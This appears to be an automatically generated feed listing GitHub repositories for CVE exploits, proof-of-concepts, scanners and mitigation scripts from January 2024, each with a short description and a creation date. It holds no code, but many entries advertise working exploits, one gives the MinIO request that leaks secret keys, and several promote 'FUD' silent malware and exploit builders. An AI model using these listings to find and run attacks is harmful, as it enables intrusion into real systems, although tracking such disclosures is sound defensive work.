**CVE-2023-22527** : [Privia-Security/CVE-2023-22527](https://github.com/Privia-Security/CVE-2023-22527) create time: 2024-01-24T21:29:59Z

**CVE-2024-22939** : [NUDTTAN91/CVE-2024-22939](https://github.com/NUDTTAN91/CVE-2024-22939) create time: 2024-01-25T07:00:38Z

**V8 type confusion allows chrome sandbox escape** : [paulsery/CVE_2023_3420](https://github.com/paulsery/CVE_2023_3420) create time: 2024-01-24T19:21:19Z

**This script exploits the CVE-2024-0204 vulnerability in Fortra GoAnywhere MFT, allowing the creation of unauthorized administrative users, for educational and authorized testing purposes.** : [m-cetin/CVE-2024-0204](https://github.com/m-cetin/CVE-2024-0204) create time: 2024-01-24T20:10:34Z

**PoC de Polkit** : [cerodah/CVE-2021-4034](https://github.com/cerodah/CVE-2021-4034) create time: 2024-01-17T22:55:46Z

**Workaround for disabling the CLI to mitigate SECURITY-3314/CVE-2024-23897 and SECURITY-3315/CVE-2024-23898** : [jenkinsci-cert/SECURITY-3314-3315](https://github.com/jenkinsci-cert/SECURITY-3314-3315) create time: 2024-01-23T19:19:04Z

**IBM i Access Client Solutions < 1.1.9.4 - Remote code execution via insecure deserialisation** : [afine-com/CVE-2023-45185](https://github.com/afine-com/CVE-2023-45185) create time: 2024-01-24T13:53:36Z

**no description** : [hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140](https://github.com/hshivhare67/platform_frameworks_base_android-4.2.2_r1_CVE-2023-40140) create time: 2024-01-24T12:42:48Z

**no description** : [mistymntncop/CVE-2022-4262](https://github.com/mistymntncop/CVE-2022-4262) create time: 2024-01-24T11:58:54Z

**Exploit for CVE-2023-22527 - Atlassian Confluence** : [yoryio/CVE-2023-22527](https://github.com/yoryio/CVE-2023-22527) create time: 2024-01-24T04:44:59Z

**Scanning for vulnerable GoAnywhere MFT CVE-2024-0204** : [cbeek-r7/CVE-2024-0204](https://github.com/cbeek-r7/CVE-2024-0204) create time: 2024-01-23T22:42:58Z

**no description** : [jjjjjjjj987/cve-2023-45866-py](https://github.com/jjjjjjjj987/cve-2023-45866-py) create time: 2024-01-23T21:39:41Z

**cpanel_xss_2023 is a simple Python script designed for finding CVE-2023-29489 vulnerability in cpanel.** : [mdaseem03/cpanel_xss_2023](https://github.com/mdaseem03/cpanel_xss_2023) create time: 2024-01-23T20:29:57Z

**Authentication Bypass in GoAnywhere MFT** : [horizon3ai/CVE-2024-0204](https://github.com/horizon3ai/CVE-2024-0204) create time: 2024-01-23T20:16:14Z

**no description** : [thanhlam-attt/CVE-2023-7028](https://github.com/thanhlam-attt/CVE-2023-7028) create time: 2024-01-23T19:11:11Z

**An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22527 leads to RCE** : [sanjai-AK47/CVE-2023-22527](https://github.com/sanjai-AK47/CVE-2023-22527) create time: 2024-01-23T17:07:15Z

**Analysis of the vulnerability** : [RomanRybachek/CVE-2024-20698](https://github.com/RomanRybachek/CVE-2024-20698) create time: 2024-01-17T04:35:42Z

**IBM i Access Client Solutions < 1.1.9.4 - Weak password encryption** : [afine-com/CVE-2023-45182](https://github.com/afine-com/CVE-2023-45182) create time: 2024-01-23T16:05:55Z

**Lỗ hổng ủy quyền không phù hợp trong Trung tâm dữ liệu Confluence và Máy chủ + bugsBonus 🔥** : [bibo318/CVE-2023-22518](https://github.com/bibo318/CVE-2023-22518) create time: 2024-01-23T13:38:40Z

**no description** : [uthrasri/CVE-2023-40109](https://github.com/uthrasri/CVE-2023-40109) create time: 2024-01-23T13:03:31Z

**Atlassian Confluence - Remote Code Execution** : [Chocapikk/CVE-2023-22527](https://github.com/Chocapikk/CVE-2023-22527) create time: 2024-01-23T10:55:28Z

**no description** : [Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab](https://github.com/Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab) create time: 2024-01-23T10:37:07Z

**POC** : [Niuwoo/CVE-2023-22527](https://github.com/Niuwoo/CVE-2023-22527) create time: 2024-01-23T09:28:53Z

**no description** : [CBaekhyunC/cve-2024-65230](https://github.com/CBaekhyunC/cve-2024-65230) create time: 2024-01-23T10:16:43Z

**no description** : [xiaoqiao147/cve-2024-666](https://github.com/xiaoqiao147/cve-2024-666) create time: 2024-01-23T09:26:07Z

**no description** : [uthrasri/CVE-2023-5717_G3](https://github.com/uthrasri/CVE-2023-5717_G3) create time: 2024-01-23T09:15:49Z

**no description** : [uthrasri/CVE-2023-5717](https://github.com/uthrasri/CVE-2023-5717) create time: 2024-01-23T09:04:00Z

**Atlassian Confluence - Remote Code Execution (CVE-2023-22527)** : [C1ph3rX13/CVE-2023-22527](https://github.com/C1ph3rX13/CVE-2023-22527) create time: 2024-01-23T08:53:46Z

**This repository presents a proof-of-concept of CVE-2023-22527** : [Vozec/CVE-2023-22527](https://github.com/Vozec/CVE-2023-22527) create time: 2024-01-23T08:06:15Z

**Vertical Privilege Escalation via Session Storage by Amjad Ali (CVE-2023-43317)** : [amjadali-110/CVE-2023-43317](https://github.com/amjadali-110/CVE-2023-43317) create time: 2024-01-23T07:27:30Z

**[Confluence] CVE-2023-22527 realworld poc** : [VNCERT-CC/CVE-2023-22527-confluence](https://github.com/VNCERT-CC/CVE-2023-22527-confluence) create time: 2024-01-23T07:10:55Z

**Vertical Privilege Escalation via Session Storage by Amjad Ali (CVE-2023-43317)** : [amjadali-110/CVE-2023-43317](https://github.com/amjadali-110/CVE-2023-43317) create time: 2024-01-23T07:10:39Z

**projectworlds' Online Admission System RCE vulnerability PoC, Categorized as CVE-2024-0783** : [keru6k/Online-Admission-System-RCE-PoC](https://github.com/keru6k/Online-Admission-System-RCE-PoC) create time: 2024-01-21T13:26:09Z

**no description** : [Manh130902/CVE-2023-22527-POC](https://github.com/Manh130902/CVE-2023-22527-POC) create time: 2024-01-23T02:17:36Z

**no description** : [th3poetx1337/CVE-2018-6574-exploit](https://github.com/th3poetx1337/CVE-2018-6574-exploit) create time: 2024-01-22T22:04:20Z

**no description** : [Praveenms13/CVE-2023-29489](https://github.com/Praveenms13/CVE-2023-29489) create time: 2024-01-22T15:54:49Z

**Exploit for CVE-2022-25765** : [lowercasenumbers/CVE-2022-25765](https://github.com/lowercasenumbers/CVE-2022-25765) create time: 2024-01-22T14:45:34Z

**no description** : [Praveenms13/CVE-2023-29489](https://github.com/Praveenms13/CVE-2023-29489) create time: 2024-01-22T15:10:30Z

**no description** : [LiveOverflow/webp-CVE-2023-4863](https://github.com/LiveOverflow/webp-CVE-2023-4863) create time: 2023-12-18T23:12:25Z

**A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.** : [cleverg0d/CVE-2023-22527](https://github.com/cleverg0d/CVE-2023-22527) create time: 2024-01-22T13:26:45Z

**no description** : [uthrasri/CVE-2023-28588_G2.5_singlefile](https://github.com/uthrasri/CVE-2023-28588_G2.5_singlefile) create time: 2024-01-22T13:17:35Z

**no description** : [Drun1baby/CVE-2023-22527](https://github.com/Drun1baby/CVE-2023-22527) create time: 2024-01-22T11:38:55Z

**A modification to fortra's CVE-2023-28252 exploit, compiled to exe** : [duck-sec/CVE-2023-28252-Compiled-exe](https://github.com/duck-sec/CVE-2023-28252-Compiled-exe) create time: 2024-01-22T10:38:02Z

**CVE-2024-20656** : [xiaoqiao147/CVE-2024-20654](https://github.com/xiaoqiao147/CVE-2024-20654) create time: 2024-01-22T08:04:37Z

**Forked from @worawit, shorter&optimized. Only works for sudo=1.8.23 on Centos7** : [wurwur/CVE-2021-3156](https://github.com/wurwur/CVE-2021-3156) create time: 2024-01-22T04:42:34Z

**This Tool is used to check for CVE-2023-29489 Vulnerability in the provided URL with the set of payloads available** : [prasad-1808/tool-29489](https://github.com/prasad-1808/tool-29489) create time: 2024-01-21T19:23:47Z

**no description** : [Whhxy4/CVE-2023-51385_test](https://github.com/Whhxy4/CVE-2023-51385_test) create time: 2024-01-21T10:51:27Z

**simple application with a CVE-2022-45688 vulnerability** : [scabench/jsonorg-fn1](https://github.com/scabench/jsonorg-fn1) create time: 2024-01-21T01:28:23Z

**exploit for ivanti** : [tucommenceapousser/CVE-2024-21887](https://github.com/tucommenceapousser/CVE-2024-21887) create time: 2024-01-20T19:15:23Z

**Repository containing a Proof of Concept (PoC) demonstrating the impact of CVE-2023-4911, a vulnerability in glibc's ld.so dynamic loader, exposing risks related to Looney Tunables.** : [NishanthAnand21/CVE-2023-4911-PoC](https://github.com/NishanthAnand21/CVE-2023-4911-PoC) create time: 2024-01-20T18:47:07Z

**Exploit of account take-over in Gitlab** : [TheRedDevil1/CVE-2023-7028](https://github.com/TheRedDevil1/CVE-2023-7028) create time: 2024-01-20T14:44:14Z

**no description** : [Hkhanbing/cve-2023-poc](https://github.com/Hkhanbing/cve-2023-poc) create time: 2024-01-20T08:06:17Z

**CVE-2021-24917** : [dikalasenjadatang/CVE-2021-24917](https://github.com/dikalasenjadatang/CVE-2021-24917) create time: 2024-01-20T06:36:13Z

**Writeup and exploit for CVE-2023-45777, bypass for Intent validation inside AccountManagerService on Android 13 despite "Lazy Bundle" mitigation** : [michalbednarski/TheLastBundleMismatch](https://github.com/michalbednarski/TheLastBundleMismatch) create time: 2024-01-20T07:14:06Z

**CVE-2023-51385-save** : [farliy-hacker/CVE-2023-51385-save](https://github.com/farliy-hacker/CVE-2023-51385-save) create time: 2024-01-20T06:20:37Z

**CVE-2023-51385** : [farliy-hacker/CVE-2023-51385](https://github.com/farliy-hacker/CVE-2023-51385) create time: 2024-01-20T06:09:45Z

**ColorMag <= 3.1.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation** : [RandomRobbieBF/CVE-2024-0679](https://github.com/RandomRobbieBF/CVE-2024-0679) create time: 2024-01-19T22:30:51Z

**exploit from CVE-2023-2255** : [Mathieuleto/CVE-2023-2255](https://github.com/Mathieuleto/CVE-2023-2255) create time: 2024-01-19T20:49:31Z

**Lexmark CVE-2023-26067.** : [RosePwns/Lexmark-RCE](https://github.com/RosePwns/Lexmark-RCE) create time: 2024-01-19T19:54:41Z

**no description** : [jacobadodge/Spring2024_CVENG_8160](https://github.com/jacobadodge/Spring2024_CVENG_8160) create time: 2024-01-19T18:49:59Z

**no description** : [yanfernandess/Looney-Tunables-CVE-2023-4911](https://github.com/yanfernandess/Looney-Tunables-CVE-2023-4911) create time: 2024-01-19T18:20:05Z

**no description** : [DashaMilitskaya/cve_2023_21822](https://github.com/DashaMilitskaya/cve_2023_21822) create time: 2024-01-19T16:35:09Z

**no description** : [uthrasri/G2.5_CVE-2023-28588](https://github.com/uthrasri/G2.5_CVE-2023-28588) create time: 2024-01-19T14:46:51Z

**Remote Code Execution : Ivanti** : [zwxxb/CVE-2024-21887](https://github.com/zwxxb/CVE-2024-21887) create time: 2024-01-19T14:17:49Z

**no description** : [matiasarenhard/rails-cve-2017-17917](https://github.com/matiasarenhard/rails-cve-2017-17917) create time: 2024-01-18T22:12:54Z

**no description** : [uthrasri/CVE-2023-33902_single_file](https://github.com/uthrasri/CVE-2023-33902_single_file) create time: 2024-01-19T13:17:16Z

**no description** : [uthrasri/CVE-2023-28588_Singlefile](https://github.com/uthrasri/CVE-2023-28588_Singlefile) create time: 2024-01-19T12:58:22Z

**no description** : [tamaloa/avo-CVE-2024-22411](https://github.com/tamaloa/avo-CVE-2024-22411) create time: 2024-01-19T09:19:52Z

**Writeup of a heap overflow vulnerability in the GNU coreutils split program. CVE-2024-0684** : [Valentin-Metz/writeup_split](https://github.com/Valentin-Metz/writeup_split) create time: 2023-12-15T06:33:15Z

**no description** : [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped) create time: 2024-01-19T08:11:31Z

**Ivanti Pulse Secure CVE-2023-46805 Scanner - Based on Assetnote's Research** : [Chocapikk/CVE-2023-46805](https://github.com/Chocapikk/CVE-2023-46805) create time: 2024-01-19T02:23:13Z

**Mitigation validation utility for the Ivanti Connect Around attack chain, comprising CVE-2023-46805 and CVE-2024-21887.** : [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan) create time: 2024-01-19T02:12:11Z

**A flaw was found in the Django package, which leads to a SQL injection. This flaw allows an attacker using a crafted dictionary containing malicious SQL queries to compromise the database completely.** : [kamal-marouane/CVE-2022-28346](https://github.com/kamal-marouane/CVE-2022-28346) create time: 2024-01-19T00:15:59Z

**The script in this repository only checks whether the vulnerabilities specified in the Ivanti Connect Secure product exist.** : [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887) create time: 2024-01-18T13:25:46Z

**CVE-2023-7028 killer** : [Esonhugh/gitlab_honeypot](https://github.com/Esonhugh/gitlab_honeypot) create time: 2024-01-18T10:13:18Z

**Exploit CVE-2023-35001** : [mrbrelax/Exploit_CVE-2023-35001](https://github.com/mrbrelax/Exploit_CVE-2023-35001) create time: 2024-01-18T08:24:07Z

**CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC** : [ga0we1/CVE-2023-22527_Confluence_RCE](https://github.com/ga0we1/CVE-2023-22527_Confluence_RCE) create time: 2024-01-17T10:21:00Z

**CVE-2024-22416 exploit experiments** : [mindstorm38/ensimag-secu3a-cve-2024-22416](https://github.com/mindstorm38/ensimag-secu3a-cve-2024-22416) create time: 2024-01-18T08:49:07Z

**Exploit for KNet 1.04b Web Server Buffer Overflow SEH** : [3t3rn4lv01d/CVE-2005-0575](https://github.com/3t3rn4lv01d/CVE-2005-0575) create time: 2024-01-18T05:29:06Z

**Exploit PoC for Buffer overflow vulnerability in the server in IBM Tivoli Storage Manager FastBack 5.5.x and 6.x before 6.1.12.2 (tested in version 6.1.4)** : [3t3rn4lv01d/CVE-2015-1986](https://github.com/3t3rn4lv01d/CVE-2015-1986) create time: 2024-01-18T05:54:58Z

**Exploit for CVE-2023-7028** : [yoryio/CVE-2023-7028](https://github.com/yoryio/CVE-2023-7028) create time: 2024-01-18T05:17:00Z

**no description** : [matiasarenhard/rails-cve-2017-17917](https://github.com/matiasarenhard/rails-cve-2017-17917) create time: 2024-01-18T03:08:59Z

**PoC under work, CVE-2016-8823** : [SpiralBL0CK/NDAY_CVE_2016_8823](https://github.com/SpiralBL0CK/NDAY_CVE_2016_8823) create time: 2024-01-18T01:10:01Z

**Critical Security Vulnerability in Ellucian Banner System** : [3zizme/CVE-2023-49339](https://github.com/3zizme/CVE-2023-49339) create time: 2024-01-17T23:18:29Z

**A one-click script to gain a System privileges command line in Windows 10 20H2 that exploits CVE-2021-1675** : [peckre/PNCVE-Win10-20H2-Exploit](https://github.com/peckre/PNCVE-Win10-20H2-Exploit) create time: 2024-01-17T20:22:29Z

**InstaWP Connect <= 0.1.0.8 - Missing Authorization to Arbitrary Options Update (Subscriber+)** : [RandomRobbieBF/CVE-2024-22145](https://github.com/RandomRobbieBF/CVE-2024-22145) create time: 2024-01-17T20:56:21Z

**CVE-2023-49001** : [actuator/com.gurry.kvbrowser](https://github.com/actuator/com.gurry.kvbrowser) create time: 2023-11-17T06:17:44Z

**no description** : [4ARMED/cve-2023-5044](https://github.com/4ARMED/cve-2023-5044) create time: 2024-01-17T14:32:54Z

**no description** : [FuBoLuSec/CVE-2023-6895-RCE](https://github.com/FuBoLuSec/CVE-2023-6895-RCE) create time: 2024-01-17T12:53:47Z

**Here is a script to check vulns CVE-2023-46805 and CVE-2024-21887** : [TheRedDevil1/Check-Vulns-Script](https://github.com/TheRedDevil1/Check-Vulns-Script) create time: 2024-01-17T10:29:02Z

**PoC for CVE-2023-48858** : [Shumerez/CVE-2023-48858](https://github.com/Shumerez/CVE-2023-48858) create time: 2024-01-17T09:59:39Z

**CVE-2023-44452, CVE-2023-51698: CBT File Parsing Argument Injection that affected Popular Linux Distros** : [febinrev/atril_cbt-inject-exploit](https://github.com/febinrev/atril_cbt-inject-exploit) create time: 2024-01-17T09:26:16Z

**This exploit scans whether the provided target is vulnerable to CVE-2023-49070/CVE-2023-51467 and also exploits it depending on the choice of the user.** : [Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467](https://github.com/Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467) create time: 2024-01-17T07:31:26Z

**CVE-2023-44451, CVE-2023-52076: RCE Vulnerability affected popular Linux Distros including Mint, Kali, Parrot, Manjaro etc. EPUB File Parsing Directory Traversal Remote Code Execution** : [febinrev/slippy-book-exploit](https://github.com/febinrev/slippy-book-exploit) create time: 2024-01-17T05:50:38Z

**This is a fix POC CVE-2020-11651 & CVE-2020-11651** : [limon768/CVE-2020-11652-CVE-2020-11652-POC](https://github.com/limon768/CVE-2020-11652-CVE-2020-11652-POC) create time: 2024-01-17T04:15:16Z

**CVE-2023-49965 | SpaceX / Starlink Router Gen 2 XSS** : [hackintoanetwork/SpaceX-Starlink-Router-Gen-2-XSS](https://github.com/hackintoanetwork/SpaceX-Starlink-Router-Gen-2-XSS) create time: 2024-01-17T01:24:15Z

**CVE-2023-45866 - BluetoothDucky implementation (Using DuckyScript)** : [Eason-zz/BluetoothDucky](https://github.com/Eason-zz/BluetoothDucky) create time: 2024-01-16T07:44:35Z

**🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript) 🔓 Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)** : [pentestfunctions/BlueDucky](https://github.com/pentestfunctions/BlueDucky) create time: 2024-01-16T06:52:02Z

**A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.** : [Chocapikk/CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21887) create time: 2024-01-16T20:59:38Z

**no description** : [jfrog/jfrog-CVE-2023-43786-libX11_DoS](https://github.com/jfrog/jfrog-CVE-2023-43786-libX11_DoS) create time: 2024-01-16T20:04:05Z

**no description** : [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887) create time: 2024-01-16T19:40:59Z

**Tool for checking the Ivanti Connect Secure System Snapshot for IOCs related to CVE-2023-46805 and CVE-2024-21887** : [rxwx/pulse-meter](https://github.com/rxwx/pulse-meter) create time: 2024-01-16T19:19:52Z

**CVE-2023-47883** : [actuator/com.altamirano.fabricio.tvbrowser](https://github.com/actuator/com.altamirano.fabricio.tvbrowser) create time: 2023-09-17T21:01:22Z

**Exploit information for CVE-2023-26609** : [D1G17/CVE-2023-26609](https://github.com/D1G17/CVE-2023-26609) create time: 2024-01-16T15:02:39Z

**Exploit information for CVE-2023-26602** : [D1G17/CVE-2023-26602](https://github.com/D1G17/CVE-2023-26602) create time: 2024-01-16T15:01:33Z

**CVE-2023-46303 - SSRF Vulnerability in PANDOC and CALIBRE** : [0x1717/ssrf-via-img](https://github.com/0x1717/ssrf-via-img) create time: 2023-05-28T07:26:49Z

**Report and exploit of CVE-2024-21305.** : [tandasat/CVE-2024-21305](https://github.com/tandasat/CVE-2024-21305) create time: 2023-12-16T23:27:34Z

**no description** : [Sudistark/patch-diff-CVE-2023-22527](https://github.com/Sudistark/patch-diff-CVE-2023-22527) create time: 2024-01-16T13:50:49Z

**Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2023-1326** : [Pol-Ruiz/CVE-2023-1326](https://github.com/Pol-Ruiz/CVE-2023-1326) create time: 2024-01-16T10:20:53Z

**no description** : [Pol-Ruiz/CVE-2021-4034](https://github.com/Pol-Ruiz/CVE-2021-4034) create time: 2024-01-16T10:18:38Z

**CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC** : [Avento/CVE-2023-22527_Confluence_RCE](https://github.com/Avento/CVE-2023-22527_Confluence_RCE) create time: 2024-01-16T08:46:21Z

**Simple scanner for scanning a list of ip-addresses for vulnerable Ivanti Pulse Secure devices** : [cbeek-r7/CVE-2023-46805](https://github.com/cbeek-r7/CVE-2023-46805) create time: 2024-01-16T08:05:58Z

**1.验证CVE-2016-4437、2.解析rememberMe的文件和CBC加密的IV偏移** : [xk-mt/CVE-2016-4437](https://github.com/xk-mt/CVE-2016-4437) create time: 2024-01-15T08:24:40Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [Checkdos/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Checkdos/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-15T17:57:38Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [Checkdos/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Checkdos/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-15T17:57:38Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [Checkdos/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Checkdos/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-15T17:57:38Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [Checkdos/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Checkdos/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2024-01-15T17:57:37Z

**no description** : [BishopFox/CVE-2022-22274_CVE-2023-0656](https://github.com/BishopFox/CVE-2022-22274_CVE-2023-0656) create time: 2024-01-12T20:03:51Z

**An exploit for the Sitecore Remote Code Execution Vulnerability** : [BagheeraAltered/CVE-2023-35813-PoC](https://github.com/BagheeraAltered/CVE-2023-35813-PoC) create time: 2024-01-15T14:14:42Z

**Exploit information for CVE-2023-26609** : [d1gg0r/CVE-2023-26609](https://github.com/d1gg0r/CVE-2023-26609) create time: 2024-01-15T14:03:19Z

**Exploit information for CVE-2023-26602** : [d1gg0r/CVE-2023-26602](https://github.com/d1gg0r/CVE-2023-26602) create time: 2024-01-15T13:58:11Z

**CVE-2023-31756 Proof of Concept - Remote Code Execution for Archer V1/V2 Routers** : [StanleyJobsonAU/LongBow](https://github.com/StanleyJobsonAU/LongBow) create time: 2024-01-15T13:32:38Z

**no description** : [forsaken0128/CVE-2024-0193-Kernel-Root-Bypass](https://github.com/forsaken0128/CVE-2024-0193-Kernel-Root-Bypass) create time: 2024-01-15T11:48:01Z

**no description** : [forsaken0128/CVE-2024-0252-RCE](https://github.com/forsaken0128/CVE-2024-0252-RCE) create time: 2024-01-15T10:29:11Z

**PoC CVE-2023-5043** : [r0binak/CVE-2023-5043](https://github.com/r0binak/CVE-2023-5043) create time: 2024-01-15T09:20:35Z

**Privilege escalation using the XAML diagnostics API** : [baph0m3th/CVE-2023-36003](https://github.com/baph0m3th/CVE-2023-36003) create time: 2024-01-15T08:19:32Z

**CVE-2023-45866 - BluetoothDucky implementation (Using DuckyScript)** : [pentestfunctions/BluetoothDucky](https://github.com/pentestfunctions/BluetoothDucky) create time: 2024-01-15T07:58:28Z

**CVE-2021-3129** : [Axianke/CVE-2021-3129](https://github.com/Axianke/CVE-2021-3129) create time: 2024-01-15T07:12:07Z

**no description** : [Axianke/CVE-2021-3129](https://github.com/Axianke/CVE-2021-3129) create time: 2024-01-15T03:32:32Z

**CVE-2024-23200** : [l00neyhacker/CVE-2024-23200](https://github.com/l00neyhacker/CVE-2024-23200) create time: 2024-01-14T21:46:27Z

**CVE-2024-23199** : [l00neyhacker/CVE-2024-23199](https://github.com/l00neyhacker/CVE-2024-23199) create time: 2024-01-14T21:43:45Z

**Quick scanner for possible vulnerable Ivanti Connect Secure appliances by country using Shodan.** : [yoryio/CVE-2023-46805_CVE-2024-21887_Scanner](https://github.com/yoryio/CVE-2023-46805_CVE-2024-21887_Scanner) create time: 2024-01-14T18:30:11Z

**no description** : [s3mPr1linux/CVE_2023_360003_POC](https://github.com/s3mPr1linux/CVE_2023_360003_POC) create time: 2024-01-14T18:15:17Z

**Quick scanner for possible Vulnerable Ivanti Secure Connection Appliances by country using Shodan.** : [yoryio/CVE-2023-46805_CVE-2024-21887_Scanner](https://github.com/yoryio/CVE-2023-46805_CVE-2024-21887_Scanner) create time: 2024-01-14T18:06:24Z

**POC Checker for ivanti CVE-2024-21887 Command injcetion** : [oways/ivanti-CVE-2024-21887](https://github.com/oways/ivanti-CVE-2024-21887) create time: 2024-01-14T09:25:56Z

**no description** : [Vladshambaryan/https-github.com-jamf-CVE-2020-0796-RCE-POC](https://github.com/Vladshambaryan/https-github.com-jamf-CVE-2020-0796-RCE-POC) create time: 2024-01-13T23:54:45Z

**CVE-2023-6875 PoC** : [UlyssesSaicha/CVE-2023-6875](https://github.com/UlyssesSaicha/CVE-2023-6875) create time: 2024-01-13T15:23:17Z

**CVE-2022-20818: Local Privilege Escalation via Partial File Read in Cisco SD-WAN** : [mbadanoiu/CVE-2022-20818](https://github.com/mbadanoiu/CVE-2022-20818) create time: 2024-01-13T00:17:53Z

**no description** : [Team-Byerus/CVE-2023-51000](https://github.com/Team-Byerus/CVE-2023-51000) create time: 2024-01-13T10:11:18Z

**Auto exploit script for the Java web framework OF Biz under CVE-2023-51467.** : [Jake123otte1/BadBizness](https://github.com/Jake123otte1/BadBizness) create time: 2024-01-13T05:40:38Z

**Program ini adalah alat (tool) yang dibuat untuk memeriksa keamanan sistem Minio terkait dengan kerentanan CVE-2022-35919** : [ifulxploit/Minio-Security-Vulnerability-Checker](https://github.com/ifulxploit/Minio-Security-Vulnerability-Checker) create time: 2024-01-13T00:49:51Z

**This repository presents a proof-of-concept of CVE-2023-7028** : [Vozec/CVE-2023-7028](https://github.com/Vozec/CVE-2023-7028) create time: 2024-01-12T18:29:27Z

**An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.** : [duy-31/CVE-2023-7028](https://github.com/duy-31/CVE-2023-7028) create time: 2024-01-12T15:17:59Z

**no description** : [Wh04m1001/CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656) create time: 2024-01-12T15:08:01Z

**system_bt_CVE-2023-28588** : [uthrasri/CVE-2023-28588_system_bt](https://github.com/uthrasri/CVE-2023-28588_system_bt) create time: 2024-01-12T14:58:59Z

**no description** : [Trinadh465/CVE-2023-28588](https://github.com/Trinadh465/CVE-2023-28588) create time: 2024-01-12T14:15:42Z

**no description** : [uthrasri/CVE-2023-28588](https://github.com/uthrasri/CVE-2023-28588) create time: 2024-01-12T13:59:34Z

**CVE-2023-7028** : [RandomRobbieBF/CVE-2023-7028](https://github.com/RandomRobbieBF/CVE-2023-7028) create time: 2024-01-12T10:53:50Z

**CVE-2023-50164 (Apache Struts path traversal to RCE vulnerability) - Proof of Concept** : [sunnyvale-it/CVE-2023-50164-PoC](https://github.com/sunnyvale-it/CVE-2023-50164-PoC) create time: 2024-01-12T09:34:57Z

**CVE-2023-7028 poc** : [V1lu0/CVE-2023-7028](https://github.com/V1lu0/CVE-2023-7028) create time: 2024-01-12T07:42:02Z

**By passing an overly large string when invoking nethack, it is possible to corrupt memory. jnethack and falconseye are also prone to this vulnerability.** : [fengjixuchui/CVE-2003-0358](https://github.com/fengjixuchui/CVE-2003-0358) create time: 2023-11-22T01:35:11Z

**CVE-2023-49070 exploit and CVE-2023-49070 & CVE-2023-51467 vulnerability scanner** : [yukselberkay/CVE-2023-49070_CVE-2023-51467](https://github.com/yukselberkay/CVE-2023-49070_CVE-2023-51467) create time: 2024-01-11T22:35:57Z

**Privilege escalation using the XAML diagnostics API (CVE-2023-36003)** : [m417z/CVE-2023-36003-POC](https://github.com/m417z/CVE-2023-36003-POC) create time: 2024-01-11T19:17:13Z

**Simple Student Attendance System v.1.0 - Cross-site scripting (XSS) vulnerabilities in attendance_report** : [geraldoalcantara/CVE-2023-51802](https://github.com/geraldoalcantara/CVE-2023-51802) create time: 2024-01-11T17:28:16Z

**no description** : [geraldoalcantara/CVE-2023-51801](https://github.com/geraldoalcantara/CVE-2023-51801) create time: 2024-01-11T17:14:33Z

**Multiple cross-site scripting (XSS) vulnerabilities in School Fees Management System v1.0.** : [geraldoalcantara/CVE-2023-51800](https://github.com/geraldoalcantara/CVE-2023-51800) create time: 2024-01-11T16:28:04Z

**no description** : [Pastea/CVE-2023-51810](https://github.com/Pastea/CVE-2023-51810) create time: 2024-01-10T17:47:54Z

**Tool for finding CVE-2021-20323** : [Cappricio-Securities/CVE-2021-20323](https://github.com/Cappricio-Securities/CVE-2021-20323) create time: 2024-01-11T16:02:07Z

**minio系统存在信息泄露漏洞,未经身份认证的远程攻击,通过发送特殊POST请求到/minio/bootstrap/v1/verify即可获取所有敏感信息,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,可能导致管理员账号密码泄露。** : [xk-mt/CVE-2023-28432](https://github.com/xk-mt/CVE-2023-28432) create time: 2024-01-11T13:41:20Z

**A go-exploit for Apache OFBiz CVE-2023-51467** : [vulncheck-oss/cve-2023-51467](https://github.com/vulncheck-oss/cve-2023-51467) create time: 2024-01-09T16:58:06Z

